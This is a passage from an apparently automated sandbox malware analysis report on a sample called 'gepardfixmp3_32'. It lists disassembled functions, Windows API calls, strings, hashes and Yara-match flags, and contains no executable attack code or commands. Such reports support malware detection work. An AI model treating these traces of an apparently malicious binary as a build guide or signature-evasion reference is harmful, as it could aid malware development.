                                                            • Opcode Fuzzy Hash: e1aeb6afc2cf888b0ec74f322efc49c971e27f51cf5d5861793ea71ff5e28efa
                                                            • Instruction Fuzzy Hash: 3E51BC759043189FDB22DF69C844B16BBE4FF88764F098E59E8599B280D731ED08CBD2
                                                            APIs
                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02C457A0
                                                            • __FindPESection.LIBCMT ref: 02C457BA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                            • String ID:
                                                            • API String ID: 876702719-0
                                                            • Opcode ID: 298402531c55524896e63024be0fe2035781f9a2f8abe88f596b25014be11edd
                                                            • Instruction ID: dbe1c60601dbad5d1063247b0505d4eb98205a4c2d80ef6d0f998eacf1cd235d
                                                            • Opcode Fuzzy Hash: 298402531c55524896e63024be0fe2035781f9a2f8abe88f596b25014be11edd
                                                            • Instruction Fuzzy Hash: 68A1BF71E407158FDB11CF18D880BAAB7A5EBA4364FA44669DC05AB341EB31EE85CB90
                                                            APIs
                                                            • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040674D
                                                            • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 00406767
                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040679B
                                                            • MultiByteToWideChar.KERNEL32(00406317,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004067D3
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406829
                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040683B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: StringType$ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 3852931651-0
                                                            • Opcode ID: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                            • Instruction ID: 7abba187aa9a424c0dbe6a0d425d95b5373609879485ba3de4d3a8f21a169ece
                                                            • Opcode Fuzzy Hash: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                            • Instruction Fuzzy Hash: 11418D72901209EFCF209F94CD85EAF3B79FB04754F11453AF912F2290D73989608B99
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C21CB1
                                                            • CloseHandle.KERNEL32(?), ref: 02C21CBA
                                                            • InterlockedExchangeAdd.KERNEL32(02C5727C,00000000), ref: 02C21CC6
                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02C21CD4
                                                            • QueueUserAPC.KERNEL32(02C21E7C,?,00000000), ref: 02C21CE1
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C21CEC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1946104331-0
                                                            • Opcode ID: eb9ac08224fbe77f660e478cf61e253216472695fa2470d1f0b6247511385c14
                                                            • Instruction ID: 12b18d6783f581dd760e1020b57659ed57054b5ad14dfece0856df7def5cb55b
                                                            • Opcode Fuzzy Hash: eb9ac08224fbe77f660e478cf61e253216472695fa2470d1f0b6247511385c14
                                                            • Instruction Fuzzy Hash: FFF08639541214BFDB104B95DD0DD57FFFCEB457207004759F51A81150DBA06914CBA0
                                                            APIs
                                                            • WSASetLastError.WS2_32(00000000), ref: 02C22BE4
                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02C22C07
                                                              • Part of subcall function 02C2A50D: WSAGetLastError.WS2_32(00000000,?,?,02C22A51), ref: 02C2A51B
                                                            • WSASetLastError.WS2_32 ref: 02C22CD3
                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C22CE7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Recvselect
                                                            • String ID: 3'
                                                            • API String ID: 886190287-280543908
                                                            • Opcode ID: 798567fdc35f9eb842fece44f562c15b1c7f8bb721f2552819e393afaa3cea43
                                                            • Instruction ID: 98e68072dc3257b36da3a3d7eff4f1d0e2a89e4de977b4d9d006561ed61e9a7f
                                                            • Opcode Fuzzy Hash: 798567fdc35f9eb842fece44f562c15b1c7f8bb721f2552819e393afaa3cea43
                                                            • Instruction Fuzzy Hash: 34414AB19143119FD721AF64C8047ABBBE9AF88358F100D1EE899C7281EFB4D548CF92
                                                            APIs
                                                            • GetVersionExA.KERNEL32 ref: 00403ECB
                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F00
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403F60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                            • API String ID: 1385375860-4131005785
                                                            • Opcode ID: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                            • Instruction ID: b9728f854654bad712525c43123df79641ae2587965f18a3091eb02ea7af310c
                                                            • Opcode Fuzzy Hash: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                            • Instruction Fuzzy Hash: 42312771D002896DEB319A309C45BDA7F7C9B12309F2400FBE545F52C2D6398F8A8718
                                                            APIs
                                                            • std::exception::exception.LIBCMT ref: 02C3198F
                                                              • Part of subcall function 02C324E3: std::exception::_Copy_str.LIBCMT ref: 02C324FC
                                                              • Part of subcall function 02C30D60: __CxxThrowException@8.LIBCMT ref: 02C30DBE
                                                            • std::exception::exception.LIBCMT ref: 02C319EE
                                                            Strings
                                                            • boost unique_lock has no mutex, xrefs: 02C3197E
                                                            • boost unique_lock owns already the mutex, xrefs: 02C319DD
                                                            • $, xrefs: 02C319F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                            • API String ID: 2140441600-46888669
                                                            • Opcode ID: 0cc609eb861c11defb1fe9f465e1ed1f782f82ab42b479ad69c6bdecb155a14a
                                                            • Instruction ID: 45e05ec2697f8ab66cec2dff3d002eca9d2754a6b231f9d76a720f3fa76d5257
                                                            • Opcode Fuzzy Hash: 0cc609eb861c11defb1fe9f465e1ed1f782f82ab42b479ad69c6bdecb155a14a
                                                            • Instruction Fuzzy Hash: D421E4B19087809FD721DF24C54475BBBE9BB88B18F404E5EF4A587280DBB5D908DF92
                                                            APIs
                                                            • __getptd_noexit.LIBCMT ref: 02C34A90
                                                              • Part of subcall function 02C35C82: GetLastError.KERNEL32(76230A60,7622F550,02C35E70,02C33043,7622F550,?,02C2606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02C26508), ref: 02C35C84
                                                              • Part of subcall function 02C35C82: __calloc_crt.LIBCMT ref: 02C35CA5
                                                              • Part of subcall function 02C35C82: __initptd.LIBCMT ref: 02C35CC7
                                                              • Part of subcall function 02C35C82: GetCurrentThreadId.KERNEL32 ref: 02C35CCE
                                                              • Part of subcall function 02C35C82: SetLastError.KERNEL32(00000000,02C2606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02C26508), ref: 02C35CE6
                                                            • __calloc_crt.LIBCMT ref: 02C34AB3
                                                            • __get_sys_err_msg.LIBCMT ref: 02C34AD1
                                                            • __invoke_watson.LIBCMT ref: 02C34AEE
                                                            Strings
                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02C34A9B, 02C34AC1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                            • API String ID: 109275364-798102604
                                                            • Opcode ID: 30453511d9db8ce01b281529a622a2a3d66d03276274780ea41b6d2655cad654
                                                            • Instruction ID: 8cd7ab10e5a321a7680c6907738970f500e16fce05d0d4e07535135a334c0e36
                                                            • Opcode Fuzzy Hash: 30453511d9db8ce01b281529a622a2a3d66d03276274780ea41b6d2655cad654
                                                            • Instruction Fuzzy Hash: FAF0E9725C4B147BEA3BB55A6C40A2B72CDDB84AA4B040E26F944D6200EB22DE00769C
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                            • GetLastError.KERNEL32 ref: 02C2237A
                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                            • String ID: pqcs
                                                            • API String ID: 1619523792-2559862021
                                                            • Opcode ID: 9bd7d1ce5baf64ac41c8ed225705be481d1ed58eef802f12f11bb0fd1faf4486
                                                            • Instruction ID: f01d13848f7fdb9d4386df9c91b5ef8fef8dd4c4fda9f4a8a5d3d7fcf784f68e
                                                            • Opcode Fuzzy Hash: 9bd7d1ce5baf64ac41c8ed225705be481d1ed58eef802f12f11bb0fd1faf4486
                                                            • Instruction Fuzzy Hash: 59F05B759413146FD710EF749909BAB7BECEB40605F004A55E809D3140FB70E5189BD1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C24035
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C24042
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C24049
                                                            • std::exception::exception.LIBCMT ref: 02C24063
                                                              • Part of subcall function 02C2A6CE: __EH_prolog.LIBCMT ref: 02C2A6D3
                                                              • Part of subcall function 02C2A6CE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A6E2
                                                              • Part of subcall function 02C2A6CE: __CxxThrowException@8.LIBCMT ref: 02C2A701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                            • String ID: bad allocation
                                                            • API String ID: 3112922283-2104205924
                                                            • Opcode ID: 29e77c26e9c66036258533f4f5276d9fddefb3d2a62e232c3043c474967165ab
                                                            • Instruction ID: c3ccc5fd25c101a58cad1e8d7ba5e82bde1e3cac412d7c9831567327d3e36e84
                                                            • Opcode Fuzzy Hash: 29e77c26e9c66036258533f4f5276d9fddefb3d2a62e232c3043c474967165ab
                                                            • Instruction Fuzzy Hash: 34F08CB1E40209ABDB10EFE0D818BEFBBB9EB08745F804A49E915A2240DF3456188F91
                                                            APIs
                                                            • GetStartupInfoA.KERNEL32(?), ref: 00403D2D
                                                            • GetFileType.KERNEL32(00000800), ref: 00403DD3
                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 00403E2C
                                                            • GetFileType.KERNEL32(00000000), ref: 00403E3A
                                                            • SetHandleCount.KERNEL32 ref: 00403E71
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3384337183.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.3384337183.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_gepardfixmp3_32.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType$CountInfoStartup
                                                            • String ID:
                                                            • API String ID: 1710529072-0
                                                            • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                            • Instruction ID: 0b7b95883a4e689196e32d1b42849a04f4efe08137134e81777c7f486c9ce5ca
                                                            • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                            • Instruction Fuzzy Hash: 025125716046458BD7218F38CE847667FA8AF11722F15437AE4A2FB3E0C7389A45CB8D
                                                            APIs
                                                              • Part of subcall function 02C31A60: CloseHandle.KERNEL32(00000000,4E988375), ref: 02C31AB1
                                                              • Part of subcall function 02C31A60: WaitForSingleObject.KERNEL32(?,000000FF,4E988375,?,?,?,?,4E988375,02C31A33,4E988375), ref: 02C31AC8
                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C31D2E
                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C31D4E
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C31D87
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C31DDB
                                                            • SetEvent.KERNEL32(?), ref: 02C31DE2
                                                              • Part of subcall function 02C2418C: CloseHandle.KERNEL32(00000000,?,02C31D15), ref: 02C241B0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 4166353394-0
                                                            • Opcode ID: df05879b346cf4e15dc75607e49024119746f434ac4964c74ec809f72eb59041
                                                            • Instruction ID: 4d638387cd64c6dd8fe815529d0a5853d63e8196dde6d46c753155f02bd062a4
                                                            • Opcode Fuzzy Hash: df05879b346cf4e15dc75607e49024119746f434ac4964c74ec809f72eb59041
                                                            • Instruction Fuzzy Hash: A041DE316403118FDB279F28DC80B17B7A4EF86724F180AA8EC19EB295D774D905CBE1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C2E101
                                                              • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2E180
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C2E19C
                                                            • InterlockedIncrement.KERNEL32(02C55190), ref: 02C2E1C1
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2E1D6
                                                              • Part of subcall function 02C227F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C2284E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                            • String ID:
                                                            • API String ID: 1578506061-0
                                                            • Opcode ID: 79a3f533d76f86bc2b8088663f17c2df44e487dbaf1cd2f8d86a9464fdb3d968
                                                            • Instruction ID: 46b432f06cc88de2cb9b216d17502831fa14812c93125141b24c18548d8d9b67
                                                            • Opcode Fuzzy Hash: 79a3f533d76f86bc2b8088663f17c2df44e487dbaf1cd2f8d86a9464fdb3d968
                                                            • Instruction Fuzzy Hash: CF3137B1D012149FCB10DF68C9446AABBF8BF48314F14456ED849E7601EB74A608CFA0
                                                            APIs
                                                            • WSASetLastError.WS2_32(00000000), ref: 02C22A3B
                                                            • closesocket.WS2_32 ref: 02C22A42
                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C22A89
                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02C22A97
                                                            • closesocket.WS2_32 ref: 02C22A9E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                            • String ID:
                                                            • API String ID: 1561005644-0
                                                            • Opcode ID: cd5eab5fa65eb0b20c6fb89fcedbb8defc5b0f75e1bf36dc7212fe1b7d868365
                                                            • Instruction ID: 923e18f2506b6e997be0ac2930f744d5b5662c8e344e05f12372c22e1ae81bd7
                                                            • Opcode Fuzzy Hash: cd5eab5fa65eb0b20c6fb89fcedbb8defc5b0f75e1bf36dc7212fe1b7d868365
                                                            • Instruction Fuzzy Hash: A721F876E40215EBEB309BB8D84476AB7EDEF88319F144969EC55C3241EF70CA488B52
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C21BAC
                                                            • RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                            • RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                            • RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                            • RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                            • String ID:
                                                            • API String ID: 1633115879-0
                                                            • Opcode ID: b2e0fcceb9863a031b241481603c68323716816e1a6c1fa4f3cc8d11e96e7d06
                                                            • Instruction ID: d94b4a1b5f4640a7c95b6e8b15989143532761925d93740ae7e92c24cb2c22e2
                                                            • Opcode Fuzzy Hash: b2e0fcceb9863a031b241481603c68323716816e1a6c1fa4f3cc8d11e96e7d06
                                                            • Instruction Fuzzy Hash: 5021A1B9900614EFCB14CF68C44479ABBB5FF88714F15858AEC5997302DBB4EA09CBE0
                                                            APIs
                                                            • _malloc.LIBCMT ref: 02C403C0
                                                              • Part of subcall function 02C32FBC: __FF_MSGBANNER.LIBCMT ref: 02C32FD3
                                                              • Part of subcall function 02C32FBC: __NMSG_WRITE.LIBCMT ref: 02C32FDA
                                                              • Part of subcall function 02C32FBC: RtlAllocateHeap.NTDLL(009B0000,00000000,00000001), ref: 02C32FFF
                                                            • _free.LIBCMT ref: 02C403D3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap_free_malloc
                                                            • String ID:
                                                            • API String ID: 1020059152-0
                                                            • Opcode ID: 3a439c8d39100af677b5737ff86e2f83f0a08daf6180b999842a271784c79eb7
                                                            • Instruction ID: da515b9e9be3baad665345a23ad23f05d6b3f1ba7ed2b87de88ab9bff615bcf6
                                                            • Opcode Fuzzy Hash: 3a439c8d39100af677b5737ff86e2f83f0a08daf6180b999842a271784c79eb7
                                                            • Instruction Fuzzy Hash: 6C11C632984611AFDF2A2F70A84475B3BD9AF483E4F504E29FB099A190DF39C950DAD0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C221DA
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221ED
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C22224
                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C22237
                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C22261
                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                              • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                              • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                            • String ID:
                                                            • API String ID: 1856819132-0
                                                            • Opcode ID: bc9c0da5b0a812feca4931393a7e9672c7648b6034d675f6e856caf01b247d54
                                                            • Instruction ID: 7ef64bda68724877e7d7b1fbc18defb52a7006440fdb6da0d4b0549654b2ca4c
                                                            • Opcode Fuzzy Hash: bc9c0da5b0a812feca4931393a7e9672c7648b6034d675f6e856caf01b247d54
                                                            • Instruction Fuzzy Hash: 15117271D00224EBCB119FA4DC046AEFBBAFB54324F00461AEC15E2260DB714659DF92
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 02C2229D
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C222B0
                                                            • TlsGetValue.KERNEL32 ref: 02C222E7
                                                            • TlsSetValue.KERNEL32(?), ref: 02C22300
                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02C2231C
                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                              • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                              • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                              • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                            • String ID:
                                                            • API String ID: 1856819132-0
                                                            • Opcode ID: 340ff2b3e2955eec1c5d10e90fff7da61476df8c33d163eef7cb5fd6c64dda93
                                                            • Instruction ID: 399e6682e2828802269ed81ea9e598da8efdbc6e6c07acfd80fd15ba6f744d45
                                                            • Opcode Fuzzy Hash: 340ff2b3e2955eec1c5d10e90fff7da61476df8c33d163eef7cb5fd6c64dda93
                                                            • Instruction Fuzzy Hash: 37112E76D00229EBCB119FA5DC446AEFBBAFF54310F00455AE804A3250DB715A59DF91
                                                            APIs
                                                              • Part of subcall function 02C2B169: __EH_prolog.LIBCMT ref: 02C2B16E
                                                            • __CxxThrowException@8.LIBCMT ref: 02C2BD33
                                                              • Part of subcall function 02C3456A: RaiseException.KERNEL32(?,?,02C2FB63,?,?,?,?,?,?,?,02C2FB63,?,02C50F98,?), ref: 02C345BF
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02C51DB4,?,00000001), ref: 02C2BD49
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C2BD5C
                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02C51DB4,?,00000001), ref: 02C2BD6C
                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2BD7A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                            • String ID:
                                                            • API String ID: 2725315915-0
                                                            • Opcode ID: 30b4d431dba5d34228a6b36a41032fa19f4ffeff42ffb185557f372d1bce894d
                                                            • Instruction ID: b5128b5fdff46069281431c91f60c3ef7a3006cbe41bfbf4e6bcb6e2d6f1f1f0
                                                            • Opcode Fuzzy Hash: 30b4d431dba5d34228a6b36a41032fa19f4ffeff42ffb185557f372d1bce894d
                                                            • Instruction Fuzzy Hash: 340181BAA40215AFDB10DAE4DC89FC7B7ADEB04359F004A14F656D6190DBA0ED489B60
                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                            • String ID:
                                                            • API String ID: 747265849-0
                                                            • Opcode ID: f6124d934448a66f26968beaae2e836898035b4a4b027ab01e7caa5d926a4649
                                                            • Instruction ID: 4d2c3512acbfba216aac017ba8780cde78ac08f11c553612bbcf1075977a4217
                                                            • Opcode Fuzzy Hash: f6124d934448a66f26968beaae2e836898035b4a4b027ab01e7caa5d926a4649
                                                            • Instruction Fuzzy Hash: 4DF01D76641215BBD7109AA0ED89FD7B76CFB44711F804911F741D6480DB61B928CBE1
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(?), ref: 02C21ED2
                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C21EEA
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C21EF9
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02C21F0E
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C21F15
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3386774824.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_2c21000_gepardfixmp3_32.jbxd
                                                            Yara matches
                                                            Similarity
